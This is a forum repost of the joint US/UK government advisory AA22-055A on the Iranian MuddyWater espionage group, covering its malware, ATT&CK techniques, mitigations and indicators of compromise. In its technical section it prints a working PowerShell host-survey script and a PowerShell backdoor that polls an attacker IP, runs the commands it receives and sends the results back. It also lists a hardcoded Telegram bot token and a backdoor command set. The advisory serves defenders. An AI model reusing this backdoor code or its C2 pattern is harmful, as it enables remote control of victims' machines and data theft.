US-CERT- AA22-055A : Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks

Started by Netwörkheäd, February 24, 2022, 12:14:49 PM

Previous topic - Next topic
Print
Go Down Pages1
User actions

Netwörkheäd

February 24, 2022, 12:14:49 PM
AA22-055A : Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks

[html]Original release date: February 24, 2022

Summary

Actions to Take Today to Protect Against Malicious Activity

* Search for indicators of compromise.

* Use antivirus software.

* https://us-cert.cisa.gov/ncas/tips/ST04-006">Patch all systems.

* Prioritize patching https://www.cisa.gov/known-exploited-vulnerabilities-catalog">known exploited vulnerabilities.

* Train users to recognize and report https://us-cert.cisa.gov/ncas/tips/ST04-014">phishing attempts.

* Use https://us-cert.cisa.gov/ncas/tips/ST05-012">multi-factor authentication.



Note: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the https://attack.mitre.org/versions/v10/techniques/enterprise/">ATT&CK for Enterprise for all referenced threat actor tactics and techniques.



The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom's National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.



MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/">1] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.



MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims' systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity. 



This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. 



FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. Note: also see the Additional Resources section.





https://us-cert.cisa.gov/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf">Click here for a PDF version of this report.


Technical Details

FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. 



As part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor's C2 server or a PDF file that drops a malicious file to the victim's network [https://attack.mitre.org/versions/v10/techniques/T1566/001/">T1566.001, https://attack.mitre.org/versions/v10/techniques/T1204/002">T1204.002]. MuddyWater actors also use techniques such as side-loading DLLs [https://attack.mitre.org/versions/v10/techniques/T1574/002/">T1574.002] to trick legitimate programs into running malware and obfuscating PowerShell scripts [https://attack.mitre.org/versions/v10/techniques/T1059/001/">T1059.001] to hide C2 functions [https://attack.mitre.org/versions/v10/techniques/T1027/">T1027] (see the PowGoop section for more information). 



Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [https://attack.mitre.org/versions/v10/tactics/TA0003/">TA0003], and exfiltration [https://attack.mitre.org/versions/v10/tactics/TA0010/">TA0010]. See below for descriptions of some of these malware sets, including newer tools or variants to the group's suite. Additionally, see Malware Analysis Report https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a">MAR-10369127.r1.v1: MuddyWater for further details.



PowGoop



MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.



According to samples of PowGoop analyzed by https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a">CISA and https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/">CNMF, PowGoop consists of three components:





These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. 



Small Sieve



According to a sample https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf">analyzed by NCSC-UK, Small Sieve is a simple Python [https://attack.mitre.org/versions/v10/techniques/T1059/006/">T1059.006] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe. The NSIS installs the Python backdoor, index.exe, and adds it as a registry run key [https://attack.mitre.org/versions/v10/techniques/T1547/001/">T1547.001], enabling persistence [https://attack.mitre.org/versions/v10/tactics/TA0003/">TA0003]. 



MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., "Microsift") and Outlook in its filenames associated with Small Sieve [https://attack.mitre.org/versions/v10/techniques/T1036/005/">T1036.005].



Small Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [https://attack.mitre.org/versions/v10/tactics/TA0005/">TA0005] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve's beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [https://attack.mitre.org/versions/v10/techniques/T1071/001">T1071.001], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [https://attack.mitre.org/versions/v10/techniques/T1027">T1027], https://attack.mitre.org/versions/v10/techniques/T1132/002/">T1132.002].



Note: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. 



See Appendix B for further analysis of Small Sieve malware.



Canopy



MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [https://attack.mitre.org/versions/v10/techniques/T1566/001">T1566.001]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. 



In the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [https://attack.mitre.org/versions/v10/techniques/T1204/002/">T1204.002]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.



The first .wsf is installed in the current user startup folder [https://attack.mitre.org/versions/v10/techniques/T1547/001/">T1547.001] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [https://attack.mitre.org/versions/v10/techniques/T1027/">T1027]. The file executes a command to run the second .wsf.



The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [https://attack.mitre.org/versions/v10/tactics/TA0035/">TA0035] the victim system's IP address, computer name, and username [https://attack.mitre.org/versions/v10/techniques/T1005/">T1005]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, http[:]88.119.170[.]124, via an HTTP POST request [https://attack.mitre.org/versions/v10/techniques/T1041/">T1041].



Mori



MuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group's C2 infrastructure [https://attack.mitre.org/versions/v10/techniques/T1572/">T1572]. 



According to one sample analyzed by CISA, FML.dll, Mori uses a DLL written in C++ that is executed with regsvr32.exe with export DllRegisterServer; this DLL appears to be a component to another program. FML.dll contains approximately 200MB of junk data [https://attack.mitre.org/versions/v10/techniques/T1001/001/">T1001.001] in a resource directory 205, number 105. Upon execution, FML.dll creates a mutex, 0x50504060, and performs the following tasks:




       
  • Deletes the file FILENAME.old and deletes file by registry value. The filename is the DLL file with a .old extension.

    •    
  • Resolves networking APIs from strings that are ADD-encrypted with the key 0x05.

    •    
  • Uses Base64 and Java Script Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.

    •    
  • Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [https://attack.mitre.org/versions/v10/techniques/T1071/001/">T1071.001].

    •    
  • Reads and/or writes data from the following Registry Keys, HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default).



POWERSTATS



This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [https://attack.mitre.org/versions/v10/techniques/T1059">T1059.001]. 



CNMF has posted samples further detailing the different parts of MuddyWater's new suite of tools— along with JavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and repository, http://www.virustotal.com/en/user/CYBERCOM_Malware_Alert">Virus Total. Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.



MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472">CVE-2020-1472) and the Microsoft Exchange memory corruption vulnerability (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688">CVE-2020-0688). See https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA's Known Exploited Vulnerabilities Catalog for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: https://www.cisa.gov/uscert/ncas/alerts/aa21-321a">Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities for additional Iranian APT group-specific vulnerability exploits.



Survey Script



The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.



$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += ";;";$ips = "";Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | % {$ips = $ips + ", " + $_.IPAddress[0]};$S += $ips.substring(1);$S += ";;";$S += $O.OSArchitecture;$S += ";;";$S += [System.Net.DNS]::GetHostByName('').HostName;$S += ";;";$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += ";;";$S += $env:UserName;$S += ";;";$AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct  -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;


Newly Identified PowerShell Backdoor



The newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.



function encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add('cookie',(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;}


MITRE ATT&CK Techniques



https://attack.mitre.org/groups/G0069/">MuddyWater uses the ATT&CK techniques listed in table 1.



Table 1: MuddyWater ATT&CK Techniques[https://attack.mitre.org/versions/v10/groups/G0069/">2]




   
      
         
         
         
      
   
   
      
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
      
      
         
         
         
      
   
Technique TitleIDUse
Reconnaissance
Gather Victim Identity Information: Email Addresseshttps://attack.mitre.org/versions/v10/techniques/T1589/002">T1589.002MuddyWater has specifically targeted government agency employees with spearphishing emails.
Resource Development
Acquire Infrastructure: Web Serviceshttps://attack.mitre.org/versions/v10/techniques/T1583/006/">T1583.006MuddyWater has used file sharing services including OneHub to distribute tools.
Obtain Capabilities: Toolhttps://attack.mitre.org/versions/v10/techniques/T1588/002">T1588.002MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments.
Initial Access
Phishing: Spearphishing Attachmenthttps://attack.mitre.org/versions/v10/techniques/T1566/001">T1566.001MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments. 
Phishing: Spearphishing Linkhttps://attack.mitre.org/versions/v10/techniques/T1566/002">T1566.002MuddyWater has sent targeted spearphishing emails with malicious links.
Execution
Windows Management Instrumentationhttps://attack.mitre.org/versions/v10/techniques/T1047">T1047MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information.
Command and Scripting Interpreter: PowerShellhttps://attack.mitre.org/versions/v10/techniques/T1059/001/">T1059.001MuddyWater has used PowerShell for execution.
Command and Scripting Interpreter: Windows Command Shellhttps://attack.mitre.org/versions/v10/techniques/T1059/003">1059.003MuddyWater has used a custom tool for creating reverse shells.
Command and Scripting Interpreter: Visual Basichttps://attack.mitre.org/versions/v10/techniques/T1059/005">T1059.005MuddyWater has used Virtual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros.
Command and Scripting Interpreter: Pythonhttps://attack.mitre.org/versions/v10/techniques/T1059/006">T1059.006MuddyWater has used developed tools in Python including Out1. 
Command and Scripting Interpreter: JavaScripthttps://attack.mitre.org/versions/v10/techniques/T1059/007">T1059.007MuddyWater has used JavaScript files to execute its POWERSTATS payload.
Exploitation for Client Executionhttps://attack.mitre.org/versions/v10/techniques/T1203">T1203MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.
User Execution: Malicious Linkhttps://attack.mitre.org/versions/v10/techniques/T1204/001">T1204.001MuddyWater has distributed URLs in phishing emails that link to lure documents.
User Execution: Malicious Filehttps://attack.mitre.org/versions/v10/techniques/T1204/002">T1204.002MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.
Inter-Process Communication: Component Object Modelhttps://attack.mitre.org/versions/v10/techniques/T1559/001">T1559.001MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.
Inter-Process Communication: Dynamic Data Exchangehttps://attack.mitre.org/versions/v10/techniques/T1559/002">T1559.002MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange.
Persistence
Scheduled Task/Job: Scheduled Taskhttps://attack.mitre.org/versions/v10/techniques/T1053/005">T1053.005MuddyWater has used scheduled tasks to establish persistence.
Office Application Startup: Office Template Macroshttps://attack.mitre.org/versions/v10/techniques/T1137/001">T1137.001MuddyWater has used a Word Template, Normal.dotm, for persistence.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folderhttps://attack.mitre.org/versions/v10/techniques/T1547/001/">T1547.001MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence. 
Privilege Escalation
Abuse Elevation Control Mechanism: Bypass User Account Control https://attack.mitre.org/versions/v10/techniques/T1548/002/">T1548.002MuddyWater uses various techniques to bypass user account control.
Credentials from Password Storeshttps://attack.mitre.org/versions/v10/techniques/T1555">T1555MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.
Credentials from Web Browsers
         

https://attack.mitre.org/versions/v10/techniques/T1055/003">T1555.003


         		MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.
Defense Evasion
Obfuscated Files or Informationhttps://attack.mitre.org/versions/v10/techniques/T1027">T1027MuddyWater has used Daniel Bohannon's Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.
Steganographyhttps://attack.mitre.org/versions/v10/techniques/T1027/003">T1027.003MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.
Compile After Deliveryhttps://attack.mitre.org/versions/v10/techniques/T1027/004">T1027.004MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.
Masquerading: Match Legitimate Name or Locationhttps://attack.mitre.org/versions/v10/techniques/T1036/005">T1036.005MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection.
Deobfuscate/Decode Files or Information
         

https://attack.mitre.org/versions/v10/techniques/T1140">T1140


         		MuddyWater decoded Base64-encoded PowerShell commands using a VBS file.
Signed Binary Proxy Execution: CMSTP
         

https://attack.mitre.org/versions/v10/techniques/T1218/003">T1218.003


         		MuddyWater has used CMSTP.exe and a malicious .INF file to execute its POWERSTATS payload.
Signed Binary Proxy Execution: Mshtahttps://attack.mitre.org/versions/v10/techniques/T1218/005">T1218.005MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.
Signed Binary Proxy Execution: Rundll32https://attack.mitre.org/versions/v10/techniques/T1218/011">T1218.011MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.
Execution Guardrailshttps://attack.mitre.org/versions/v10/techniques/T1480/">T1480The Small Sieve payload used by MuddyWater will only execute correctly if the word "Platypus" is passed to it on the command line.
Impair Defenses: Disable or Modify Toolshttps://attack.mitre.org/versions/v10/techniques/T1562/001">T1562.001MuddyWater can disable the system's local proxy settings.
Credential Access
OS Credential Dumping: LSASS Memoryhttps://attack.mitre.org/versions/v10/techniques/T1003/001">T1003.001MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.
OS Credential Dumping: LSA Secrets
         

https://attack.mitre.org/versions/v10/techniques/T1003/004">T1003.004


         		MuddyWater has performed credential dumping with LaZagne.
OS Credential Dumping: Cached Domain Credentialshttps://attack.mitre.org/versions/v10/techniques/T1003/005">T1003.005MuddyWater has performed credential dumping with LaZagne.
Unsecured Credentials: Credentials In Files
         

https://attack.mitre.org/versions/v10/techniques/T1552/001">T1552.001


         		MuddyWater has run a tool that steals passwords saved in victim email.
Discovery 
System Network Configuration Discoveryhttps://attack.mitre.org/versions/v10/techniques/T1016">T1016MuddyWater has used malware to collect the victim's IP address and domain name.
System Owner/User Discoveryhttps://attack.mitre.org/versions/v10/techniques/T1033">T1033MuddyWater has used malware that can collect the victim's username.
System Network Connections Discoveryhttps://attack.mitre.org/versions/v10/techniques/T1049">T1049MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.
Process Discoveryhttps://attack.mitre.org/versions/v10/techniques/T1057">T1057MuddyWater has used malware to obtain a list of running processes on the system.
System Information Discovery
         

https://attack.mitre.org/versions/v10/techniques/T1082">T1082


         		MuddyWater has used malware that can collect the victim's OS version and machine name.
File and Directory Discoveryhttps://attack.mitre.org/versions/v10/techniques/T1083">T1083MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."
Account Discovery: Domain Accounthttps://attack.mitre.org/versions/v10/techniques/T1087/002/">T1087.002MuddyWater has used cmd.exe net user/domain to enumerate domain users.
Software Discoveryhttps://attack.mitre.org/versions/v10/techniques/T1518">T1518MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.
Security Software Discoveryhttps://attack.mitre.org/versions/v10/techniques/T1518/001">T1518.001MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.
Collection
Screen Capturehttps://attack.mitre.org/versions/v10/techniques/T1113">T1113MuddyWater has used malware that can capture screenshots of the victim's machine.

         

Archive Collected Data: Archive via Utility


         		https://attack.mitre.org/versions/v10/techniques/T1560/001/">T1560.001MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.
Command and Control
Application Layer Protocol: Web Protocolshttps://attack.mitre.org/versions/v10/techniques/T1071/001/">T1071.001MuddyWater has used HTTP for C2 communications. e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS.
Proxy: External Proxyhttps://attack.mitre.org/versions/v10/techniques/T1090/002">T1090.002
         

MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. 



         

MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2.


         
Web Service: Bidirectional Communicationhttps://attack.mitre.org/versions/v10/techniques/T1102/002">T1102.002MuddyWater has used web services including OneHub to distribute remote access tools.
Multi-Stage Channelshttps://attack.mitre.org/versions/v10/techniques/T1104">T1104MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.
Ingress Tool Transferhttps://attack.mitre.org/versions/v10/techniques/T1105">T1105MuddyWater has used malware that can upload additional files to the victim's machine.
Data Encoding: Standard Encodinghttps://attack.mitre.org/versions/v10/techniques/T1132/001/">T1132.001MuddyWater has used tools to encode C2 communications including Base64 encoding.
Data Encoding: Non-Standard Encodinghttps://attack.mitre.org/versions/v10/techniques/T1132/002/">T1132.002MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic.
Remote Access Software https://attack.mitre.org/versions/v10/techniques/T1219">T1219MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.
Exfiltration
Exfiltration Over C2 Channelhttps://attack.mitre.org/versions/v10/techniques/T1041">T1041MuddyWater has used C2 infrastructure to receive exfiltrated data.


 


Mitigations

Protective Controls and Architecture




       
  • Deploy application control software to limit the applications and executable code that can be run by users. Email attachments and files downloaded via links in emails often contain executable code. 



Identity and Access Management




       
  • Use multifactor authentication where possible, particularly for webmail, virtual private networks, and accounts that access critical systems. 

    •    
  • Limit the use of administrator privileges. Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system—once infected—enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. 



Phishing Protection




       
  • Enable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. 

    •    
  • Be suspicious of unsolicited contact via email or social media from any individual you do not know personally. Do not click on hyperlinks or open attachments in these communications.

    •    
  • Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.

    •    
  • Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of user accounts exhibiting unusual activity.

    •    
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks. 



Vulnerability and Configuration Management





Additional Resources





References



https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/">[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools

https://attack.mitre.org/versions/v10/groups/G0069/">[2] MITRE ATT&CK: MuddyWater 



Caveats



The information you have accessed or received is being provided "as is" for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.



Purpose



This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States' NSA agrees with this attribution and the details provided in this report.



Appendix A: IOCs



The following IP addresses are associated with MuddyWater activity:



5.199.133[.]149

45.142.213[.]17    

45.142.212[.]61

45.153.231[.]104 

46.166.129[.]159 

80.85.158[.]49 

87.236.212[.]22

88.119.170[.]124 

88.119.171[.]213

89.163.252[.]232

95.181.161[.]49

95.181.161[.]50

164.132.237[.]65

185.25.51[.]108

185.45.192[.]228 

185.117.75[.]34

185.118.164[.]21

185.141.27[.]143

185.141.27[.]248 

185.183.96[.]7

185.183.96[.]44

192.210.191[.]188

192.210.226[.]128



Appendix B: Small Sieve



Note: the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.



Metadata



Table 2: Gram.app.exe Metadata




   
      
         
         
      
   
   
      
         
         
      
      
         
         
      
      
         
         
      
      
         
         
      
      
         
         
      
      
         
         
      
   
Filenamegram_app.exe 
DescriptionNSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key 
Size16999598 bytes 
MD515fa3b32539d7453a9a85958b77d4c95 
SHA-111d594f3b3cf8525682f6214acb7b7782056d282 
SHA-256b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054 
Compile Time2021-09-25 21:57:46 UTC 


 



Table 3: Index.exe Metadata




   
      
         
         
      
   
   
      
         
         
      
      
         
         
      
      
         
         
      
      
         
         
      
      
         
         
      
      
         
         
      
   
Filename index.exe 
DescriptionThe final PyInstaller-bundled Python 3.9 backdoor 
Size17263089 bytes 
MD55763530f25ed0ec08fb26a30c04009f1 
SHA-12a6ddf89a8366a262b56a251b00aafaed5321992 
SHA-256bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2  
Compile Time2021-08-01 04:39:46 UTC 


 



Functionality 



Installation 


Small Sieve is distributed as a large (16MB) NSIS installer named gram_app.exe, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary index.exe is installed in the user's AppData/Roaming directory and is added as a Run key in the registry to enabled persistence after reboot. 



The installer then executes the backdoor with the "Platypus" argument [https://attack.mitre.org/versions/v10/techniques/T1480/">T1480], which is also present in the registry persistence key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift



Configuration 


The backdoor attempts to restore previously initialized session data from %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt



If this file does not exist, then it uses the hardcoded values listed in table 4:



Table 4: Credentials and Session Values




   
      
         
         
         
      
   
   
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
   
Field ValueDescription
Chat ID2090761833 This is the Telegram Channel ID that beacons are sent to, and, from which, tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed. 
Bot IDRandom value between 10,000,000 and 90,000,000 This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with /com[Bot ID] in order to be processed by the malware.
Telegram Token 2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY This is the initial token used to authenticate each message to the Telegram Bot API.


 



Tasking 



Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host's IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the python-telegram-bot module. 



Two task formats are supported: 




       
  • /start – no argument is passed; this causes the beacon information to be repeated. 

    •    
  • /com[BotID] [command] – for issuing commands passed in the argument. 



The following commands are supported by the second of these formats, as described in table 5: 



Table 5: Supported Commands




   
      
         
         
      
   
   
      
         
         
      
      
         
         
      
      
         
         
      
      
         
         
      
   
CommandDescription
delete This command causes the backdoor to exit; it does not remove persistence. 
download url""filename The URL will be fetched and saved to the provided filename using the Python urllib module urlretrieve function.  
change token""newtoken The backdoor will reconnect to the Telegram Bot API using the provided token newtoken. This updated token will be stored in the encoded MicrosoftWindowsOutlookDataPlus.txt file. 
disconnect The original connection to Telegram is terminated. It is likely used after a change token command is issued. 


 



Any commands other than those detailed in table 5 are executed directly by passing them to cmd.exe /c, and the output is returned as a reply.



Defense Evasion 



Anti-Sandbox 


Let's not argue. Let's network!
Print
Go Up Pages1
User actions